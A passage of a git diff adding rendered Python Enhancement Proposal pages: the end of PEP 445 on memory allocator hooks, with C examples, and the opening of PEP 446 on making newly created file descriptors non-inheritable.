  Windows, mmap() and munmap() when available, or malloc()
  and free()
+
+

Redesign Debug Checks on Memory Block Allocators as Hooks

+

Since Python 2.3, Python implements different checks on memory +allocators in debug mode:

+
• Newly allocated memory is filled with the byte 0xCB, freed memory
  is filled with the byte 0xDB.
• Detect API violations, ex: PyObject_Free() called on a memory
  block allocated by PyMem_Malloc()
• Detect writes before the start of the buffer (buffer underflow)
• Detect writes after the end of the buffer (buffer overflow)

In Python 3.3, the checks are installed by replacing PyMem_Malloc(), +PyMem_Realloc(), PyMem_Free(), PyObject_Malloc(), +PyObject_Realloc() and PyObject_Free() using macros. The new +allocator allocates a larger buffer and writes a pattern to detect buffer +underflow, buffer overflow and use after free (by filling the buffer with +the byte 0xDB). It uses the original PyObject_Malloc() +function to allocate memory. So PyMem_Malloc() and +PyMem_Realloc() indirectly call PyObject_Malloc() and +PyObject_Realloc().

+

This PEP redesigns the debug checks as hooks on the existing allocators +in debug mode. Examples of call traces without the hooks:

+
• PyMem_RawMalloc() => _PyMem_RawMalloc() => malloc()
• PyMem_Realloc() => _PyMem_RawRealloc() => realloc()
• PyObject_Free() => _PyObject_Free()

Call traces when the hooks are installed (debug mode):

+
• PyMem_RawMalloc() => _PyMem_DebugMalloc()
  => _PyMem_RawMalloc() => malloc()
• PyMem_Realloc() => _PyMem_DebugRealloc()
  => _PyMem_RawRealloc() => realloc()
• PyObject_Free() => _PyMem_DebugFree()
  => _PyObject_Free()

As a result, PyMem_Malloc() and PyMem_Realloc() now call +malloc() and realloc() in both release mode and debug mode, +instead of calling PyObject_Malloc() and PyObject_Realloc() in +debug mode.

+

When at least one memory allocator is replaced with
PyMem_SetAllocator(), the PyMem_SetupDebugHooks() function must
be called to reinstall the debug hooks on top of the new allocator.

+
+
+

Don’t call malloc() directly anymore

+

PyObject_Malloc() falls back on PyMem_Malloc() instead of
malloc() if the requested size is greater than or equal to 512
bytes, and PyObject_Realloc() falls back on PyMem_Realloc()
instead of realloc().

+

Direct calls to malloc() are replaced with PyMem_Malloc(), or +PyMem_RawMalloc() if the GIL is not held.

+

External libraries like zlib or OpenSSL can be configured to allocate memory +using PyMem_Malloc() or PyMem_RawMalloc(). If the allocator of a +library can only be replaced globally (rather than on an object-by-object +basis), it shouldn’t be replaced when Python is embedded in an application.

+

For the “track memory usage” use case, it is important to track memory +allocated in external libraries to have accurate reports, because these +allocations can be large (e.g. they can raise a MemoryError exception) +and would otherwise be missed in memory usage reports.

+
+
+
+

Examples

+
+

Use case 1: Replace Memory Allocators, keep pymalloc

+

Dummy example wasting 2 bytes per memory block, +and 10 bytes per pymalloc arena:

+
#include <stdlib.h>
+
+size_t alloc_padding = 2;
+size_t arena_padding = 10;
+
+void* my_malloc(void *ctx, size_t size)
+{
+    int padding = *(int *)ctx;
+    return malloc(size + padding);
+}
+
+void* my_realloc(void *ctx, void *ptr, size_t new_size)
+{
+    int padding = *(int *)ctx;
+    return realloc(ptr, new_size + padding);
+}
+
+void my_free(void *ctx, void *ptr)
+{
+    free(ptr);
+}
+
+void* my_alloc_arena(void *ctx, size_t size)
+{
+    int padding = *(int *)ctx;
+    return malloc(size + padding);
+}
+
+void my_free_arena(void *ctx, void *ptr, size_t size)
+{
+    free(ptr);
+}
+
+void setup_custom_allocator(void)
+{
+    PyMemAllocator alloc;
+    PyObjectArenaAllocator arena;
+
+    alloc.ctx = &alloc_padding;
+    alloc.malloc = my_malloc;
+    alloc.realloc = my_realloc;
+    alloc.free = my_free;
+
+    PyMem_SetAllocator(PYMEM_DOMAIN_RAW, &alloc);
+    PyMem_SetAllocator(PYMEM_DOMAIN_MEM, &alloc);
+    /* leave PYMEM_DOMAIN_OBJ unchanged, use pymalloc */
+
+    arena.ctx = &arena_padding;
+    arena.alloc = my_alloc_arena;
+    arena.free = my_free_arena;
+    PyObject_SetArenaAllocator(&arena);
+
+    PyMem_SetupDebugHooks();
+}
+
+
+
+
+

Use case 2: Replace Memory Allocators, override pymalloc

+

If you have a dedicated allocator optimized for allocations of objects +smaller than 512 bytes with a short lifetime, pymalloc can be overridden +(replace PyObject_Malloc()).

+

Dummy example wasting 2 bytes per memory block:

+
#include <stdlib.h>
+
+size_t padding = 2;
+
+void* my_malloc(void *ctx, size_t size)
+{
+    int padding = *(int *)ctx;
+    return malloc(size + padding);
+}
+
+void* my_realloc(void *ctx, void *ptr, size_t new_size)
+{
+    int padding = *(int *)ctx;
+    return realloc(ptr, new_size + padding);
+}
+
+void my_free(void *ctx, void *ptr)
+{
+    free(ptr);
+}
+
+void setup_custom_allocator(void)
+{
+    PyMemAllocator alloc;
+    alloc.ctx = &padding;
+    alloc.malloc = my_malloc;
+    alloc.realloc = my_realloc;
+    alloc.free = my_free;
+
+    PyMem_SetAllocator(PYMEM_DOMAIN_RAW, &alloc);
+    PyMem_SetAllocator(PYMEM_DOMAIN_MEM, &alloc);
+    PyMem_SetAllocator(PYMEM_DOMAIN_OBJ, &alloc);
+
+    PyMem_SetupDebugHooks();
+}
+
+
+

The pymalloc arena does not need to be replaced, because it is no
longer used by the new allocator.

+
+
+

Use case 3: Setup Hooks On Memory Block Allocators

+

Example to setup hooks on all memory block allocators:

+
struct {
+    PyMemAllocator raw;
+    PyMemAllocator mem;
+    PyMemAllocator obj;
+    /* ... */
+} hook;
+
+static void* hook_malloc(void *ctx, size_t size)
+{
+    PyMemAllocator *alloc = (PyMemAllocator *)ctx;
+    void *ptr;
+    /* ... */
+    ptr = alloc->malloc(alloc->ctx, size);
+    /* ... */
+    return ptr;
+}
+
+static void* hook_realloc(void *ctx, void *ptr, size_t new_size)
+{
+    PyMemAllocator *alloc = (PyMemAllocator *)ctx;
+    void *ptr2;
+    /* ... */
+    ptr2 = alloc->realloc(alloc->ctx, ptr, new_size);
+    /* ... */
+    return ptr2;
+}
+
+static void hook_free(void *ctx, void *ptr)
+{
+    PyMemAllocator *alloc = (PyMemAllocator *)ctx;
+    /* ... */
+    alloc->free(alloc->ctx, ptr);
+    /* ... */
+}
+
+void setup_hooks(void)
+{
+    PyMemAllocator alloc;
+    static int installed = 0;
+
+    if (installed)
+        return;
+    installed = 1;
+
+    alloc.malloc = hook_malloc;
+    alloc.realloc = hook_realloc;
+    alloc.free = hook_free;
+    PyMem_GetAllocator(PYMEM_DOMAIN_RAW, &hook.raw);
+    PyMem_GetAllocator(PYMEM_DOMAIN_MEM, &hook.mem);
+    PyMem_GetAllocator(PYMEM_DOMAIN_OBJ, &hook.obj);
+
+    alloc.ctx = &hook.raw;
+    PyMem_SetAllocator(PYMEM_DOMAIN_RAW, &alloc);
+
+    alloc.ctx = &hook.mem;
+    PyMem_SetAllocator(PYMEM_DOMAIN_MEM, &alloc);
+
+    alloc.ctx = &hook.obj;
+    PyMem_SetAllocator(PYMEM_DOMAIN_OBJ, &alloc);
+}
+
+
+
+

Note

+

PyMem_SetupDebugHooks() does not need to be called because the
memory allocators are not replaced: the debug checks on memory
block allocators are installed automatically at startup.

+
+
+
+
+

Performances

+

The implementation of this PEP (issue #3329) has no visible overhead on +the Python benchmark suite.

+

Results of the Python benchmark suite (-b 2n3): some tests are 1.04x
faster, some tests are 1.04x slower. Results of the pybench
microbenchmark: “+0.1%” slower globally (diff between -4.9% and
+5.6%).

+

The full output of benchmarks is attached to the issue #3329.

+
+
+

Rejected Alternatives

+
+

More specific functions to get/set memory allocators

+

A larger set of C API functions was originally proposed, with one pair
of functions for each allocator domain:

+
• void PyMem_GetRawAllocator(PyMemAllocator *allocator)
• void PyMem_GetAllocator(PyMemAllocator *allocator)
• void PyObject_GetAllocator(PyMemAllocator *allocator)
• void PyMem_SetRawAllocator(PyMemAllocator *allocator)
• void PyMem_SetAllocator(PyMemAllocator *allocator)
• void PyObject_SetAllocator(PyMemAllocator *allocator)

This alternative was rejected because it is not possible to write +generic code with more specific functions: code must be duplicated for +each memory allocator domain.

+
+
+

Make PyMem_Malloc() reuse PyMem_RawMalloc() by default

+

If PyMem_Malloc() called PyMem_RawMalloc() by default, +calling PyMem_SetAllocator(PYMEM_DOMAIN_RAW, alloc) would also +patch PyMem_Malloc() indirectly.

+

This alternative was rejected because PyMem_SetAllocator() would +have a different behaviour depending on the domain. Always having the +same behaviour is less error-prone.

+
+
+

Add a new PYDEBUGMALLOC environment variable

+

It was proposed to add a new PYDEBUGMALLOC environment variable to
enable debug checks on memory block allocators. It would have had the
same effect as calling PyMem_SetupDebugHooks(), without the need
to write any C code. Another advantage is that it would allow debug
checks to be enabled even in release mode: debug checks would always
be compiled in, but only enabled when the environment variable is
present and non-empty.

+

This alternative was rejected because a new environment variable would +make Python initialization even more complex. PEP 432 +tries to simplify the +CPython startup sequence.

+
+
+

Use macros to get customizable allocators

+

To have no overhead in the default configuration, customizable +allocators would be an optional feature enabled by a configuration +option or by macros.

+

This alternative was rejected because the use of macros implies having
to recompile extension modules to use the new allocator and allocator
hooks. Not having to recompile Python or extension modules makes debug
hooks easier to use in practice.

+
+
+

Pass the C filename and line number

+

Define allocator functions as macros using __FILE__ and __LINE__ +to get the C filename and line number of a memory allocation.

+

Example of PyMem_Malloc macro with the modified +PyMemAllocator structure:

+
typedef struct {
+    /* user context passed as the first argument
+       to the 3 functions */
+    void *ctx;
+
+    /* allocate a memory block */
+    void* (*malloc) (void *ctx, const char *filename, int lineno,
+                     size_t size);
+
+    /* allocate or resize a memory block */
+    void* (*realloc) (void *ctx, const char *filename, int lineno,
+                      void *ptr, size_t new_size);
+
+    /* release a memory block */
+    void (*free) (void *ctx, const char *filename, int lineno,
+                  void *ptr);
+} PyMemAllocator;
+
+void* _PyMem_MallocTrace(const char *filename, int lineno,
+                         size_t size);
+
+/* the function is still needed for the Python stable ABI */
+void* PyMem_Malloc(size_t size);
+
+#define PyMem_Malloc(size) \
+        _PyMem_MallocTrace(__FILE__, __LINE__, size)
+
+
+

The GC allocator functions would also have to be patched. For example, +_PyObject_GC_Malloc() is used in many C functions and so objects of +different types would have the same allocation location.

+

This alternative was rejected because passing a filename and a line +number to each allocator makes the API more complex: pass 3 new +arguments (ctx, filename, lineno) to each allocator function, instead of +just a context argument (ctx). Having to also modify GC allocator +functions adds too much complexity for a little gain.

+
+
+

GIL-free PyMem_Malloc()

+

In Python 3.3, when Python is compiled in debug mode, PyMem_Malloc() +indirectly calls PyObject_Malloc() which requires the GIL to be +held (it isn’t thread-safe). That’s why PyMem_Malloc() must be called +with the GIL held.

+

This PEP changes PyMem_Malloc(): it now always calls malloc() +rather than PyObject_Malloc(). The “GIL must be held” restriction +could therefore be removed from PyMem_Malloc().

+

This alternative was rejected because allowing PyMem_Malloc() to be
called without holding the GIL can break applications which set up
their own allocators or allocator hooks. Holding the GIL is
convenient to develop a custom allocator: there is no need to care
about other threads. It is also convenient for a debug allocator
hook: Python objects can be safely inspected, and the C API may be
used for reporting.

+

Moreover, calling PyGILState_Ensure() in a memory allocator has
unexpected behaviour, especially at Python startup and when creating
a new Python thread state. It is better to free custom allocators of
the responsibility of acquiring the GIL.

+
+
+

Don’t add PyMem_RawMalloc()

+

Replace malloc() with PyMem_Malloc(), but only if the GIL is +held. Otherwise, keep malloc() unchanged.

+

PyMem_Malloc() is used without the GIL held in some Python
functions. For example, the main() and Py_Main() functions of
Python call PyMem_Malloc() whereas the GIL does not exist yet. In
this case, PyMem_Malloc() would be replaced with malloc() (or
PyMem_RawMalloc()).

+

This alternative was rejected because PyMem_RawMalloc() is required +for accurate reports of the memory usage. When a debug hook is used to +track the memory usage, the memory allocated by direct calls to +malloc() cannot be tracked. PyMem_RawMalloc() can be hooked and +so all the memory allocated by Python can be tracked, including +memory allocated without holding the GIL.

+
+
+

Use existing debug tools to analyze memory use

+

There are many existing debug tools to analyze memory use. Some +examples: Valgrind, Purify, Clang AddressSanitizer, failmalloc, etc.

+

The problem is to retrieve the Python object related to a memory
pointer to read its type and/or its content. Another issue is to
retrieve the source of the memory allocation: the C backtrace is
usually useless (the same reasoning as for macros using __FILE__
and __LINE__, see Pass the C filename and line number); the Python
filename and line number (or even the Python traceback) is more
useful.

+

This alternative was rejected because classic tools are unable to
introspect Python internals to collect such information. Being able
to set up a hook on allocators called with the GIL held makes it
possible to collect a lot of useful data from Python internals.

+
+
+

Add a msize() function

+

Add another function to PyMemAllocator and +PyObjectArenaAllocator structures:

+
size_t msize(void *ptr);
+
+
+

This function returns the size of a memory block or a memory mapping. +Return (size_t)-1 if the function is not implemented or if the pointer +is unknown (ex: NULL pointer).

+

On Windows, this function can be implemented using _msize() and +VirtualQuery().

+

The function could be used to implement a hook tracking the memory usage. The free() method of an allocator only receives the address of a memory block, whereas the size of the memory block is required to update the memory usage.

+

The additional msize() function was rejected because only a few platforms implement it. For example, Linux with the GNU libc does not provide a function to get the size of a memory block. msize() is not currently used in the Python source code. The function would only be used to track memory use, and it would make the API more complex. A debug hook can implement the function internally; there is no need to add it to the PyMemAllocator and PyObjectArenaAllocator structures.
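A sketch of how a debug hook can provide the equivalent internally (illustrative Python only; the real hook is C code plugged into the PyMemAllocator structure):

# Record each block's size at allocation time, keyed by its address,
# so the free() callback can update the usage counter even though it
# only receives the pointer.
sizes = {}
total = 0

def hook_malloc(ptr, size):
    global total
    sizes[ptr] = size
    total += size

def hook_free(ptr):
    global total
    total -= sizes.pop(ptr, 0)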

+
+
+

No context argument

+

Simplify the signature of allocator functions, remove the context +argument:

+
    +
  • void* malloc(size_t size)
  • +
  • void* realloc(void *ptr, size_t new_size)
  • +
  • void free(void *ptr)
  • +
+

An allocator hook is likely to be reused for PyMem_SetAllocator() and PyObject_SetAllocator(), or even PyMem_SetRawAllocator(), but the hook must call a different underlying function depending on the allocator it was installed for. The context is a convenient way to reuse the same custom allocator or hook for different Python allocators.

+

In C++, the context can be used to pass this.
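A Python analogy for the role of ctx (illustrative only; the real API passes a void *ctx to plain C functions):

# One hook implementation reused for several allocator domains; ctx
# plays the role of C++ "this", telling the hook which allocator it
# was installed for.
class TracingAllocator:
    def __init__(self, ctx):
        self.ctx = ctx

    def malloc(self, size):
        print(f"[{self.ctx}] malloc({size})")

raw_hook = TracingAllocator("raw")
obj_hook = TracingAllocator("obj")
raw_hook.malloc(16)   # [raw] malloc(16)
obj_hook.malloc(16)   # [obj] malloc(16)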

+
+
+
+

External Libraries

+

Examples of APIs used to customize memory allocators.

+

Libraries used by Python:

+ +

Other libraries:

+ +

The new ctx parameter of this PEP was inspired by the API of zlib and +Oracle’s OCI libraries.

+

See also the GNU libc: Memory Allocation Hooks +which uses a different approach to hook memory allocators.

+
+
+

Memory Allocators

+

The C standard library provides the well-known malloc() function. Its implementation depends on the platform and on the C library. The GNU C library uses a modified ptmalloc2, based on “Doug Lea’s Malloc” (dlmalloc). FreeBSD uses jemalloc. Google provides tcmalloc, which is part of gperftools.

+

malloc() uses two kinds of memory: heap and memory mappings. Memory mappings are usually used for large allocations (e.g. larger than 256 KB), whereas the heap is used for small allocations.

+

On UNIX, the heap is handled by the brk() and sbrk() system calls, and it is contiguous. On Windows, the heap is handled by HeapAlloc() and can be discontiguous. Memory mappings are handled by mmap() on UNIX and VirtualAlloc() on Windows; they can be discontiguous.

+

Releasing a memory mapping immediately gives the memory back to the system. On UNIX, heap memory is only given back to the system if the released block is located at the end of the heap. Otherwise, the memory is only given back to the system once all the memory located after the released memory is also released.

+

To allocate memory on the heap, an allocator tries to reuse free space. If there is no contiguous space big enough, the heap must be enlarged, even if there is more free space than the required size. This issue is called “memory fragmentation”: the memory usage seen by the system is higher than the real usage. On Windows, HeapAlloc() creates a new memory mapping with VirtualAlloc() if there is not enough free contiguous memory.

+

CPython has a pymalloc allocator for allocations smaller than 512 +bytes. This allocator is optimized for small objects with a short +lifetime. It uses memory mappings called “arenas” with a fixed size of +256 KB.

+

Other allocators:

+ +

This PEP makes it possible to choose exactly which memory allocator is used by your application, depending on how it uses memory (number of allocations, size of allocations, lifetime of objects, etc.).

+
+ + +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0445.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0446/index.html new file mode 100644 index 00000000000..df0dd4c37fb --- /dev/null +++ b/pep-0446/index.html @@ -0,0 +1,741 @@ + PEP 446 – Make newly created file descriptors non-inheritable | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 446 – Make newly created file descriptors non-inheritable

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
05-Aug-2013
+
Python-Version:
+
3.4
+
Replaces:
+
433
+
+
+
+
Table of Contents +
+
+

Abstract

+

Leaking file descriptors in child processes causes various annoying +issues and is a known major security vulnerability. Using the +subprocess module with the close_fds parameter set to True is +not possible in all cases.

+

This PEP proposes to make all file descriptors created by Python non-inheritable by default, to reduce the risk of these issues. This PEP also fixes a race condition in multi-threaded applications on operating systems that support atomic flags for creating non-inheritable file descriptors.

+

We are aware of the code breakage this is likely to cause, and are doing it anyway for the good of mankind. (Details in the section “Backward Compatibility” below.)

+
+
+

Rationale

+
+

Inheritance of File Descriptors

+

Each operating system handles the inheritance of file descriptors +differently. Windows creates non-inheritable handles by default, whereas +UNIX and the POSIX API on Windows create inheritable file descriptors by +default. Python prefers the POSIX API over the native Windows API, to +have a single code base and to use the same type for file descriptors, +and so it creates inheritable file descriptors.

+

There is one exception: os.pipe() creates non-inheritable pipes on +Windows, whereas it creates inheritable pipes on UNIX. The reason is an +implementation artifact: os.pipe() calls CreatePipe() on Windows +(native API), whereas it calls pipe() on UNIX (POSIX API). The call +to CreatePipe() was added in Python in 1994, before the introduction +of pipe() in the POSIX API in Windows 98. The issue #4708 proposes to change os.pipe() on +Windows to create inheritable pipes.

+
+
+

Inheritance of File Descriptors on Windows

+

On Windows, the native type of file objects is the handle (C type HANDLE). These handles have a HANDLE_FLAG_INHERIT flag which defines whether a handle can be inherited in a child process or not. For the POSIX API, the C runtime (CRT) also provides file descriptors (C type int). The handle of a file descriptor can be retrieved using the function _get_osfhandle(fd). A file descriptor can be created from a handle using the function _open_osfhandle(handle).
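On the Python side, these CRT conversions are exposed by the msvcrt module; a Windows-only sketch:

# Convert between CRT file descriptors and native handles
# (thin wrappers around _get_osfhandle()/_open_osfhandle()).
import msvcrt
import os

fd = os.open("example.txt", os.O_RDONLY | os.O_CREAT)
handle = msvcrt.get_osfhandle(fd)                 # HANDLE behind the fd
fd2 = msvcrt.open_osfhandle(handle, os.O_RDONLY)  # new fd, same handle
# fd and fd2 now share one handle; close only one of them.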

+

Using CreateProcess(), +handles are only inherited if their inheritable flag +(HANDLE_FLAG_INHERIT) is set and the bInheritHandles +parameter of CreateProcess() is TRUE; all file descriptors +except standard streams (0, 1, 2) are closed in the child process, even +if bInheritHandles is TRUE. Using the spawnv() function, all +inheritable handles and all inheritable file descriptors are inherited +in the child process. This function uses the undocumented fields +cbReserved2 and lpReserved2 of the STARTUPINFO +structure to pass an array of file descriptors.

+

To replace standard streams (stdin, stdout, stderr) using +CreateProcess(), the STARTF_USESTDHANDLES flag must be set in +the dwFlags field of the STARTUPINFO structure and the +bInheritHandles parameter of CreateProcess() must be set to +TRUE. So when at least one standard stream is replaced, all +inheritable handles are inherited by the child process.

+

The default value of the close_fds parameter of subprocess.Popen is True (bInheritHandles=FALSE) if the stdin, stdout and stderr parameters are None, and False (bInheritHandles=TRUE) otherwise.

+

See also:

+ +
+
+

Only Inherit Some Handles on Windows

+

Since Windows Vista, CreateProcess() supports an extension of the +STARTUPINFO structure: the STARTUPINFOEX structure. +Using this new structure, it is possible to specify a list of handles to +inherit: PROC_THREAD_ATTRIBUTE_HANDLE_LIST. Read Programmatically +controlling which handles are inherited by new processes in Win32 +(Raymond Chen, Dec 2011) for more information.

+

Before Windows Vista, it is possible to make handles inheritable and +call CreateProcess() with bInheritHandles=TRUE. This option +works if all other handles are non-inheritable. There is a race +condition: if another thread calls CreateProcess() with +bInheritHandles=TRUE, handles will also be inherited in the second +process.

+

Microsoft suggests using a lock to avoid the race condition: read Q315939: PRB: Child Inherits Unintended Handles During CreateProcess Call (last review: November 2006). The Python issue #16500 “Add an atfork module” proposes to add such a lock; it could be used to make handles non-inheritable without the race condition. Such a lock only protects against a race condition between Python threads; C threads are not protected.

+

Another option is to duplicate handles that must be inherited, passing the +values of the duplicated handles to the child process, so the child +process can steal duplicated handles using DuplicateHandle() +with DUPLICATE_CLOSE_SOURCE. Handle values change between the +parent and the child process because the handles are duplicated (twice); +the parent and/or the child process must be adapted to handle this +change. If the child program cannot be modified, an intermediate program +can be used to steal handles from the parent process before spawning the +final child program. The intermediate program has to pass the handle from the +child process to the parent process. The parent may have to close +duplicated handles if all handles were not stolen, for example if the +intermediate process fails. If the command line is used to pass the +handle values, the command line must be modified when handles are +duplicated, because their values are modified.

+

This PEP does not include a solution to this problem because there is no +perfect solution working on all Windows versions. This point is deferred +until use cases relying on handle or file descriptor inheritance on +Windows are well known, so we can choose the best solution and carefully +test its implementation.

+
+
+

Inheritance of File Descriptors on UNIX

+

POSIX provides a close-on-exec flag on file descriptors to automatically close a file descriptor when the C function execv() is called. File descriptors with the close-on-exec flag cleared are inherited by the child process; file descriptors with the flag set are closed in the child process.

+

The flag can be set in two syscalls (one to get current flags, a second +to set new flags) using fcntl():

+
int flags, res;
+flags = fcntl(fd, F_GETFD);
+if (flags == -1) { /* handle the error */ }
+flags |= FD_CLOEXEC;
+/* or "flags &= ~FD_CLOEXEC;" to clear the flag */
+res = fcntl(fd, F_SETFD, flags);
+if (res == -1) { /* handle the error */ }
+
+
+

FreeBSD, Linux, Mac OS X, NetBSD, OpenBSD and QNX also support setting +the flag in a single syscall using ioctl():

+
int res;
+res = ioctl(fd, FIOCLEX, 0);
+if (res == -1) { /* handle the error */ }
+
+
+

NOTE: The close-on-exec flag has no effect on fork(): all file +descriptors are inherited by the child process. The Python issue #16500 +“Add an atfork module” proposes to +add a new atfork module to execute code at fork, which may be used to +automatically close file descriptors.

+
+
+

Issues with Inheritable File Descriptors

+

Most of the time, inheritable file descriptors “leaked” to child processes go unnoticed, because they don’t cause major bugs. That does not mean that these bugs should not be fixed.

+

Two common issues with inherited file descriptors:

+
    +
  • On Windows, a directory cannot be removed before all file handles open +in the directory are closed. The same issue can be seen with files, +except if the file was created with the FILE_SHARE_DELETE flag +(O_TEMPORARY mode for open()).
  • +
  • If a listening socket is leaked to a child process, the socket address cannot be reused until both the parent and child processes have terminated. For example, if a web server spawns a new program to handle a request, and the server restarts while the program is still running, the server cannot start because the TCP port is still in use.
  • +
+

Examples of issues in open source projects:

+
    +
  • Mozilla (Firefox): +open since 2002-05
  • +
  • dbus library: +fixed in 2008-05 (dbus commit), +close file descriptors in the child process
  • +
  • autofs: +fixed in 2009-02, set the CLOEXEC flag
  • +
  • qemu: +fixed in 2009-12 (qemu commit), +set CLOEXEC flag
  • +
  • Tor: +fixed in 2010-12, set CLOEXEC flag
  • +
  • OCaml: open since +2011-04, “PR#5256: Processes opened using Unix.open_process* inherit +all opened file descriptors (including sockets)”
  • +
  • ØMQ: +open since 2012-08
  • +
  • Squid: +open since 2012-07
  • +
+

See also: Excuse me son, but your code is leaking !!! (Dan Walsh, March 2012) +for SELinux issues with leaked file descriptors.

+
+
+

Security Vulnerability

+

Leaking sensitive file handles and file descriptors can lead to security vulnerabilities. An untrusted child process might read sensitive data like passwords or take control of the parent process through a leaked file descriptor. With a leaked listening socket, a child process can accept new connections to read sensitive data.

+

Examples of vulnerabilities:

+ +

Read also the CERT Secure Coding Standards: +FIO42-C. Ensure files are properly closed when they are no longer +needed.

+
+
+

Issues fixed in the subprocess module

+

Inherited file descriptors caused 4 issues in the subprocess +module:

+ +

These issues were fixed in Python 3.2 by 4 different changes in the +subprocess module:

+
    +
  • Pipes are now non-inheritable;
  • +
  • The default value of the close_fds parameter is now True, +with one exception on Windows: the default value is False if +at least one standard stream is replaced;
  • +
  • A new pass_fds parameter has been added;
  • +
  • Creation of a _posixsubprocess module implemented in C.
  • +
+
+
+

Atomic Creation of non-inheritable File Descriptors

+

In a multi-threaded application, an inheritable file descriptor may be +created just before a new program is spawned, before the file descriptor +is made non-inheritable. In this case, the file descriptor is leaked to +the child process. This race condition could be avoided if the file +descriptor is created directly non-inheritable.

+

FreeBSD, Linux, Mac OS X, Windows and many other operating systems +support creating non-inheritable file descriptors with the inheritable +flag cleared atomically at the creation of the file descriptor.

+

A new WSA_FLAG_NO_HANDLE_INHERIT flag for WSASocket() was added in Windows 7 SP1 and Windows Server 2008 R2 SP1 to create non-inheritable sockets. If this flag is used on an older Windows version (e.g. Windows XP SP3), WSASocket() fails with WSAEPROTOTYPE.

+

On UNIX, new flags were added for files and sockets:

+
    +
  • O_CLOEXEC: available on Linux (2.6.23), FreeBSD (8.3), +Mac OS 10.8, OpenBSD 5.0, Solaris 11, QNX, BeOS, next NetBSD release +(6.1?). This flag is part of POSIX.1-2008.
  • +
  • SOCK_CLOEXEC flag for socket() and socketpair(), +available on Linux 2.6.27, OpenBSD 5.2, NetBSD 6.0.
  • +
  • fcntl(): F_DUPFD_CLOEXEC flag, available on Linux 2.6.24, +OpenBSD 5.0, FreeBSD 9.1, NetBSD 6.0, Solaris 11. This flag is part +of POSIX.1-2008.
  • +
  • fcntl(): F_DUP2FD_CLOEXEC flag, available on FreeBSD 9.1 +and Solaris 11.
  • +
  • recvmsg(): MSG_CMSG_CLOEXEC, available on Linux 2.6.23, +NetBSD 6.0.
  • +
+

On Linux older than 2.6.23, the O_CLOEXEC flag is simply ignored. fcntl() must therefore be called to check whether the file descriptor is actually non-inheritable: O_CLOEXEC is not supported if the FD_CLOEXEC flag is missing. On Linux older than 2.6.27, socket() and socketpair() fail with errno set to EINVAL if the SOCK_CLOEXEC flag is set in the socket type.
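A sketch of this check in Python, using the fcntl module (UNIX-only):

# Open with O_CLOEXEC, then verify that the kernel honoured it,
# since old kernels silently ignore the flag.
import fcntl
import os

fd = os.open("example.txt", os.O_RDONLY | getattr(os, "O_CLOEXEC", 0))
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
if not flags & fcntl.FD_CLOEXEC:
    # Atomic creation unsupported: fall back to setting the flag here,
    # accepting the race condition described above.
    fcntl.fcntl(fd, fcntl.F_SETFD, flags | fcntl.FD_CLOEXEC)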

+

New functions:

+
    +
  • dup3(): available on Linux 2.6.27 (and glibc 2.9)
  • +
  • pipe2(): available on Linux 2.6.27 (and glibc 2.9)
  • +
  • accept4(): available on Linux 2.6.28 (and glibc 2.10)
  • +
+

On Linux older than 2.6.28, accept4() fails with errno set to +ENOSYS.

+

Summary:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Operating System   Atomic File      Atomic Socket
FreeBSD            8.3 (2012)       X
Linux              2.6.23 (2007)    2.6.27 (2008)
Mac OS X           10.8 (2012)      X
NetBSD             6.1 (?)          6.0 (2012)
OpenBSD            5.0 (2011)       5.2 (2012)
Solaris            11 (2011)        X
Windows            XP (2001)        Seven SP1 (2011), 2008 R2 SP1 (2011)
+

Legend:

+
    +
  • “Atomic File”: first version of the operating system supporting +creating atomically a non-inheritable file descriptor using +open()
  • +
  • “Atomic Socket”: first version of the operating system supporting +creating atomically a non-inheritable socket
  • +
  • “X”: not supported yet
  • +
+

See also:

+ +
+
+

Status of Python 3.3

+

Python 3.3 creates inheritable file descriptors on all platforms, except +os.pipe() which creates non-inheritable file descriptors on Windows.

+

New constants and functions related to the atomic creation of +non-inheritable file descriptors were added to Python 3.3: +os.O_CLOEXEC, os.pipe2() and socket.SOCK_CLOEXEC.

+

On UNIX, the subprocess module closes all file descriptors in the +child process by default, except standard streams (0, 1, 2) and file +descriptors of the pass_fds parameter. If the close_fds parameter is +set to False, all inheritable file descriptors are inherited in the +child process.

+

On Windows, the subprocess module closes all handles and file descriptors in the child process by default. If at least one standard stream (stdin, stdout or stderr) is replaced (e.g. redirected into a pipe), all inheritable handles and file descriptors 0, 1 and 2 are inherited in the child process.

+

Using the functions of the os.execv*() and os.spawn*() families, +all inheritable handles and all inheritable file descriptors are +inherited by the child process.

+

On UNIX, the multiprocessing module uses os.fork() and so all +file descriptors are inherited by child processes.

+

On Windows, all inheritable handles and file descriptors 0, 1 and 2 are inherited by the child process when using the multiprocessing module; all file descriptors except standard streams are closed.

+

Summary:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Module                        FD on UNIX       Handles on Windows   FD on Windows
subprocess, default           STD, pass_fds    none                 STD
subprocess, replace stdout    STD, pass_fds    all                  STD
subprocess, close_fds=False   all              all                  STD
multiprocessing               not applicable   all                  STD
os.execv(), os.spawn()        all              all                  all
+

Legend:

+
    +
  • “all”: all inheritable file descriptors or handles are inherited in +the child process
  • +
  • “none”: all handles are closed in the child process
  • +
  • “STD”: only file descriptors 0 (stdin), 1 (stdout) and 2 (stderr) are +inherited in the child process
  • +
  • “pass_fds”: file descriptors of the pass_fds parameter of the +subprocess are inherited
  • +
  • “not applicable”: on UNIX, the multiprocessing module uses fork(), so this case is not affected by this PEP.
  • +
+
+
+

Closing All Open File Descriptors

+

On UNIX, the subprocess module closes almost all file descriptors in the child process. This operation requires MAXFD system calls, where MAXFD is the maximum number of file descriptors, even if only a few file descriptors are open. This maximum can be read using: os.sysconf("SC_OPEN_MAX").

+

The operation can be slow if MAXFD is large. For example, on a FreeBSD +buildbot with MAXFD=655,000, the operation took 300 ms: see +issue #11284: slow close file descriptors.

+

On Linux, Python 3.3 gets the list of all open file descriptors from /proc/<PID>/fd/, so performance depends on the number of open file descriptors, not on MAXFD.

+

See also:

+
    +
  • Python issue #1663329: +subprocess close_fds perform poor if SC_OPEN_MAX is high
  • +
